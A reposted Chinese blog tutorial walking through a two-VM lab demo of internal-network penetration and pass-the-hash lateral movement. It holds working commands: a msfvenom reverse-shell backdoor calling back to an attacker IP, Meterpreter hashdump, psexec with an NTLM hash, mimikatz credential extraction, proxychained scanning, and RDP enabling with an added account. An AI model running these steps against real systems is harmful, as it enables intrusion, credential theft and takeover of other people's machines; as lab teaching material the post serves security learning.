当前位置:首页 » 《随便一记》 » 正文

内网渗透测试小Demo-哈希传递攻击_Ocean的博客

23 人参与  2022年04月05日 11:43  分类 : 《随便一记》  评论

点击全文阅读


文章目录

    • 环境搭建
      • Win Server2003
      • Win Server2008
    • 拿shell
    • 收集信息
    • 哈希传递攻击
      • mimikatz
      • 推荐阅读

环境搭建

image-20211126192928030

Win Server2003

设置账户密码

右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便之后的操作

在vmware中为虚拟机添加一个网卡,网络连接选择LAN区段

image-20211126191247485

开机后手动设置IP地址为 10.0.0.2/24

image-20211126191456949

ipconfig

image-20211126191549556

Win Server2008

虚拟机网络连接选择LAN区段,开机后手动设置IP地址为 10.0.0.3/24

image-20211126191945717

注:两台虚拟机网络连接也可以选择仅主机模式也可以,具体配置自行百度

image-20211126191900102

拿shell

已知win werver2003存在文件上传漏洞,已经被getshell

使用MSF生成后门文件

在Kali生成后门文件

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.179.128  lport=12345 -f exe >/var/www/html/s.exe

生成完毕,通过webshell将文件上传至win服务器

kali进入msf,开启监听

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost 192.168.179.128
set lport 12345
exploit

等win服务器那边点击了exe文件,这边就上线了

image-20211126170211041

收集信息

  • 系统信息

    sysinfo

    image-20211126194154476

  • 查看路由表信息

    route

    image-20211126194213060

  • 查看进程

    ps

    image-20211126203013065

    如果失败,可以进入shell中使用tasklist查看

    image-20211126195033109

注入进程维持权限

一般注入explorer.exe进程

image-20211126195218323

migrate 2424

注入成功后每次启动explorer.exe进程都会启动shell

收集内网信息

  • 查看路由表

    run autoroute -p 
    
  • 检测内网存活

    # 通过ping命令
    run post/multi/gather/ping_sweep RHOSTS=10.0.0.0/24
    # 通过arp协议
    run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
    # 使用info查看模块信息
    info post/multi/gather/ping_sweep
    

    image-20211126203347225

  • 代理nmap扫描

    添加路由

    run autoroute -s 10.0.0.0/24
    background
    use auxiliary/server/socks4a 
    set SRVPORT 10044
    run
    

    修改配置文件

    vi /etc/prxoychains.conf
    

    注释掉原来的,添加一条新的

    socks4 192.168.179.128 10044
    

    image-20211126182913984

    这样的话路由就添加完成了

    使用nmap逐个扫描上条命令检测出来的IP

    proxychains nmap -sT -Pn 10.0.0.2 --open -oN 10.0.0.0.txt
    保存至10.0.0.0.txt中
    

    image-20211126204254279

通过端口扫描发现开放了445端口,尝试攻击

哈希传递攻击

PTH即pass-the-hash,原理是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不需要提供明文密码

使用MSF获取hash值

meterpreter > hashdump 
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
............

选择payload,使用winserver2003的账户密码hash,攻击winserver2008,因为内网环境中存在大量密码一样的主机,当我们获得了一台的hash后,可以通过该hash进行横向渗透

background
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
show options                      -->查看配置选项
set RHOST 10.0.0.3		         -->设置攻击目标IP,端口默认445
set SMBUser Administrator         -->设置账号为wing
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

攻击得到另外的session

image-20211126223643242

hash解密网站:https://www.objecif-securite.ch/ophcrack

后半段为加密数据

image-20211126205647944

mimikatz

在msf中可以直接载入mimikatz

meterpreter > load mimikatz 
meterpreter > msv
meterpreter > kerberos 

image-20211126220544814

image-20211126222530262

使用命令开启RDP

run  getgui  -e
增加帐号
run getgui -u moonsec -p moonsec

端口转发

portfwd add -l 5555 -p 3389 -r 192.168.0.111
rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
proxychains rdesktop -u Administrator -p 123456 10.10.10.134

推荐阅读

内网渗透之横向移动 – 哈希传递攻击研究

传递哈希攻击的原理介绍


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/37363.html

攻击  查看  添加  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • (番外)+(全书)霍沉洲沈青禾(此去经年人未还霍沉洲沈青禾)完结_(霍沉洲沈青禾)列表_笔趣阁(此去经年人未还霍沉洲沈青禾)
  • 「重回八零,拒绝替嫁冲喜」章节彩蛋限时释出‌_卫东玉兰苏夏人气小说未删减节选
  • 重生七零祁同伟不再是农民儿子结局+番外纯净版全书免费重生七零祁同伟不再是农民儿子结局+番外纯净版全书免费
  • 傅雅宁的神女老婆,却在背地承欢作乐顾尘傅雅宁全书在线
  • 全文神女老婆,却在背地承欢作乐全局(顾尘傅雅宁)列表_全文神女老婆,却在背地承欢作乐全局
  • (番外)+(全书)此去经年人未还全书+番外+后续免费下载_(沈青禾霍沉洲)此去经年人未还全书+番外+后续列表_笔趣阁(沈青禾霍沉洲)
  • 完结文毁容的姐姐和瞎眼的我离开后,姜家两兄弟悔哭了+后续列表_完结文毁容的姐姐和瞎眼的我离开后,姜家两兄弟悔哭了+后续(林梦婉)
  • 妻子辱我爸受贿自杀,我掏出一等军功章节选推荐_[陈素云辰朋友]小说精彩章节分享
  • 全书浏览苔藓爬满旧日诺言新上(顾砚廷慕晚夏)_苔藓爬满旧日诺言新上(顾砚廷慕晚夏)全书结局
  • 顾尘傅雅宁(神女老婆,却在背地承欢作乐+后续+结局)结局_(顾尘傅雅宁神女老婆,却在背地承欢作乐+后续+结局全书结局)结局列表_笔趣阁(顾尘傅雅宁)
  • 「老婆怀上助理的孩子后,助理要求我净身出户」章节限时抢先看‌_「黄秋雅秋雅姐刘嘉铭」后续完结版
  • 此去经年人未还,沈青禾霍沉洲_此去经年人未还,沈青禾霍沉洲

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1